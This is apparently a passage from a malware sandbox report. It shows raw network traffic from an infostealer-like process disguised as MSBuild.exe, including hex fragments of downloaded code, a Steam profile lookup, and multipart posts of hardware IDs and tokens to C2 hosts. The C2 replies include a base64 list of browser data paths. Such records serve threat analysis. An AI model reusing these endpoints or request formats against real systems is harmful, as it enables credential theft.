                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774811983 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: H)h^AaYjjh@HH-hhAaYVWj4Y@HS-jV@HAb2hrAPaY_^H-Hj)h|A.aYh
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774825096 CEST1236INData Raw: 00 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 e4 f8 83 ec 1c a1 40 80 42 00 33 c4 89 44 24 18 8b 45 10 56 8b f1 8d 4c 24 04 50 e8 43 15 00 00 8d 44 24 04 8b ce 50 ff 75 0c ff 75 08 e8 3a ff ff ff 8d 4c 24 04 e8 b5 15 00 00 8b 4c 24 1c 8b c6 c7 06 28
                                                                                                                                                                                                                    Data Ascii: YY^U@B3D$EVL$PCD$Puu:L$L$(A^3W]Vt$(A^Vt$WVAFVGW_^OBU}uMjhOBuNYMPE]D$VtjVWYY^
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774836063 CEST372INData Raw: e2 fc ff ff 5e 6a 02 58 5f c9 c3 56 8b f1 83 7e 10 00 c7 06 b8 e3 41 00 74 09 ff 76 0c e8 52 9b 00 00 59 ff 76 14 e8 49 9b 00 00 59 c7 06 5c e2 41 00 5e c3 55 8b ec 83 ec 3c 8d 45 f0 53 56 57 50 8b d9 e8 1c 4b 00 00 8b f0 8d 7b 08 8d 45 c4 50 a5
                                                                                                                                                                                                                    Data Ascii: ^jX_V~AtvRYvIY\A^U<ESVWPK{EPLYYjY{_^[APt$KJfD$YYAPt$t$t$IJVt$WPt$Ru;t$u_^Vt$WPt$Rt;t$
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774847984 CEST1236INData Raw: e8 5f 8b c6 5e c2 08 00 55 8b ec 83 ec 0c 8d 41 18 0f 57 c0 50 8d 45 f4 66 0f 13 45 f4 50 6a 01 8d 45 08 50 8d 45 fc 50 e8 7c 1d 00 00 0f b7 4d fc 83 c4 14 85 c0 ba ff ff 00 00 0f 48 ca 66 8b c1 c9 c2 04 00 e9 be ff ff ff 53 56 8b 74 24 0c 8b d9
                                                                                                                                                                                                                    Data Ascii: _^UAWPEfEPjEPEP|MHfSVt$;t$tW|$PFf;t$u_^[U@B3EAWPEfEPuEP1KMUEM3<QUSVu;utW}uP
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774858952 CEST1236INData Raw: 01 74 1c 83 e8 01 74 0d 83 e8 01 75 20 0f be 74 8a 02 c1 e6 10 0f be 44 8a 01 c1 e0 08 33 f0 0f be 04 8a 33 c6 69 c0 95 e9 d1 5b 33 d8 8b c3 c1 e8 0d 33 c3 69 c8 95 e9 d1 5b 5f 5e 5b 8b c1 c1 e8 0f 33 c1 c9 c3 55 8b ec 83 e4 f8 83 ec 2c a1 40 80
                                                                                                                                                                                                                    Data Ascii: ttu tD33i[33i[_^[3U,@B3D$(SV5$H3WT$F<D0xD$x @D$t0L$PL$;D$t*L$3C;\$r3L$4>_^[3eL]OBLPT$YB$X0B
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774871111 CEST1236INData Raw: e1 16 48 66 f7 ea 66 c1 e1 f3 4f 66 c1 c6 fb 72 18 83 fa 63 75 60 8b d9 81 e6 ac 03 00 00 b9 56 00 00 00 66 c1 e6 2b eb 14 66 c1 e8 ba 0b d0 66 c1 e1 60 66 c1 c2 47 81 ee c6 00 00 00 66 4f 66 2d aa 00 66 c1 e8 fb 83 e8 0a 41 40 66 f7 e1 66 81 ca
                                                                                                                                                                                                                    Data Ascii: HffOfrcu`Vf+ff`fGfOf-fA@fffFwffgfffvffyfH+ffFtff#rfrff#FfOf@fUf%f+f-f
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774883032 CEST1236INData Raw: 00 8b 45 f4 35 eb 15 00 00 89 45 ec c7 45 f0 27 00 00 00 8b 45 f0 35 af 01 00 00 89 45 e4 8d 45 e0 50 6a 40 ff 75 ec 68 d8 0a 48 00 ff 55 e8 85 c0 74 34 6a 1f 68 bc 0f 48 00 ba 00 80 05 00 b9 d8 8a 42 00 e8 09 f3 ff ff 59 59 be d8 8a 42 00 56 ba
                                                                                                                                                                                                                    Data Ascii: E5EE'E5EEPj@uhHUt4jhHBYYBVHMjR%AuVAjj,A3_^[VWt$3ff_^VWt$3ff/YPt$X_^VWt$3t$
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774966002 CEST1236INData Raw: 2b d9 1b f2 eb 0e 0f 57 c0 66 0f 13 45 b8 8b 75 bc 8b 5d b8 89 75 e8 ff 75 d8 8d 4d b0 e8 41 04 00 00 80 7d b4 00 75 0a 6a 04 5e 8b d6 e9 c2 01 00 00 89 7d fc a1 e8 16 48 00 8b 40 04 8b 80 18 17 48 00 8b 48 04 89 4d cc 8b 01 ff 50 04 8d 45 c8 50
                                                                                                                                                                                                                    Data Ascii: +WfEu]uuMA}uj^}H@HHMPEPYEMH@H%@tP;|L;vFHH(HP Htf;uj^UU]uuj^E;|n;vhEEM
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774980068 CEST1236INData Raw: 8b 10 0f b6 f3 85 d2 7e 13 8b 41 30 ff 08 8b 49 20 8b 11 8d 42 01 89 01 88 1a eb 08 8b 01 56 ff 50 0c 8b f0 8b c6 5e 5b c2 04 00 8b 09 85 c9 74 06 8b 01 6a 01 ff 10 c3 6a 14 b8 21 d3 41 00 e8 39 3f 00 00 8b f1 89 75 ec 8b 06 8b 40 04 8b 7c 30 38
                                                                                                                                                                                                                    Data Ascii: ~A0I BVP^[tjj!A9?u@|08VM,}txeeP43j_DUM9MPBj_j39J8EWv3@Mj_uUHj39A8EyWGM>
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.779860973 CEST776INData Raw: 83 3e 00 74 12 8b 46 08 2b 06 83 e0 fc 50 ff 36 e8 2b fa ff ff 59 59 89 3e 8b 45 e4 8d 0c 87 89 4e 04 8b 4d e0 03 cf 89 4e 08 8b 45 ec e8 eb 39 00 00 c2 08 00 ff 75 e8 ff 75 dc e8 20 f3 ff ff 6a 00 6a 00 e8 d7 48 00 00 e8 0b 00 00 00 e8 29 da ff
                                                                                                                                                                                                                    Data Ascii: >tF+P6+YY>ENMNE9uu jjH)hOB4D$=rPYtP4Y3D$H#;Q4YtA#HUQ}u3S]uE3f3VW}UG


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.85626845.132.206.251803832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.844088078 CEST281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: cowod.hopto.org
                                                                                                                                                                                                                    Content-Length: 3177
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.844124079 CEST3177OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31
                                                                                                                                                                                                                    Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FIDHIEBAAKJDHI
                                                                                                                                                                                                                    Oct 3, 2024 15:15:22.702121973 CEST188INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:22 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Served-By: cowod.hopto.org


                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.849712104.102.49.2544433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:34 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:35 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:35 GMT
                                                                                                                                                                                                                    Content-Length: 34879
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Set-Cookie: sessionid=ea29ec50f37bf0edf0dc1695; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                    2024-10-03 13:14:35 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                    2024-10-03 13:14:35 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                                                                                    Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                                                                                    2024-10-03 13:14:35 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                                                                                                                    Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                                                                                    2024-10-03 13:14:35 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                    Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.84971349.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:36 UTC184OUTGET / HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:36 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.84971449.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:37 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 256
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:37 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 45 42 34 35 37 32 31 43 39 35 31 31 31 37 33 38 38 33 36 35 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 2d 2d 0d
                                                                                                                                                                                                                    Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="hwid"B9EB45721C951117388365-a33c7340-61ca------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FIDHIEBAAKJDHIECAAFH--
                                                                                                                                                                                                                    2024-10-03 13:14:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:38 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:38 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|b53e813d9350fb5d52ee778b674f49f5|1|1|1|0|0|50000|10


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    3192.168.2.84971549.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:39 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGC
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:39 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IJKFIIIJJKJJKEBGIDGCCont
                                                                                                                                                                                                                    2024-10-03 13:14:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:39 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:39 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                    Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    4192.168.2.85623749.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:40 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IDAKJKEHDBGHIDHIEHDBCont
                                                                                                                                                                                                                    2024-10-03 13:14:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:41 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
